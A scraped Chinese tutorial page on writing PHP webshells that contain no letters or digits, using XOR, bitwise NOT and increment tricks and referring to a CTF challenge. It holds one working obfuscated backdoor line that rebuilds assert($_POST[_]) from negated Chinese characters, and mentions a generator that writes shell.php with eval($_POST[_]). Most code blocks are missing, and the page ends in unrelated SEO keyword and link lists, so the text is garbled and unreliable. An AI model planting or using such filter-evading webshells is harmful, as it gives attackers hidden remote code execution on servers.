如何实现不包含数字字母的WebShell
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!一、使用异或 ^ 运算
千家信息网最后更新 2025年01月20日如何实现不包含数字字母的WebShell一、使用异或
小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!
一、使用异或 ^
运算
这个马是不能直接用的,因为代码中的url编码其实对应的是一个不可打印的特殊字符,这里只是为了显示程序方便,作者用url编码来取代,实际上木马应该是下面这个样子:
或者你还可以按照如下两种形式修改木马,使得木马可以运行。
二、使用取反
~
运算'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[_]);// assert($_POST[_]);前两天的SUCTF就考察了这个,但是需要对代码稍作修改。原题目可以写入特殊字符只有:
~ $ _ ; = ( )
,修改如下:(PS:代码由Wfox
师傅fuzz出来,也是参考P牛的文章 )fuzz脚本如下:
'; }?>赛后官方也提供了WP,PHP中使用按位取反(~)函数创建后门 。按照这篇文章,没有成功生成可用的shell,于是我又参考了另外一篇文章 Deformity PHP Webshell、Webshell Hidden Learning ,生成脚本如下:
# generate.php 运行该程序,生成木马shell.php, assert('eval($_POST[_])');')?>三、使用自增运算
++
看完了这篇文章,相信你对"如何实现不包含数字字母的WebShell"有了一定的了解,如果想了解更多相关知识,欢迎关注行业资讯频道,感谢各位的阅读!
木马
篇文章
生成
代码
字符
运算
字母
数字
特殊
程序
编码
脚本
参考
运行
成功
作者
函数
只是
只有
后门
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
高中生网络安全宣传语
软件开发模型喷泉
违反网络安全的处罚
软件开发 兼容性设计
关于开展全市网络安全检查
电钢琴软件开发
美国网络安全漏洞战略
服务器启动不了怎么查看硬盘
rda服务器核心网
潮州有没有学软件开发培训机构
网络安全高的手机
社交软件开发思维导图
在高中学习软件开发
十九大网络安全观讲座
四川明瀚软件软件开发有限公司
关于网络安全的采访提纲
低价香港服务器
服务器返回状态码500
江苏常规网络技术参考价格
微信转发谣言 网络安全
无线网络技术中范围最小
学软件开发必看的书籍
矿产规划数据库建设存在的问题
餐厅数据库java
网络安全有哪些书籍推荐
网络安全违章
查询数据库实例命令
明日之后更新服务器在哪里
极限逃离服务器怎么关闭
郑州维爱互联网科技